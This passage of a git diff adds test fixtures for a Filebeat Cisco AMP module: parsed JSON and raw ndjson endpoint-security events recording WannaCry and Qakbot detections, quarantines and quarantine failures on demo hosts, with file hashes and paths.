"test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 96814, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 98000, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 99186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 100372, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 105894, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 423000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 107014, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064596", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 377000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 108200, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064594", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 33000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 109386, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log new file mode 100644 index 00000000000..dc134052124 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log @@ -0,0 +1,62 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 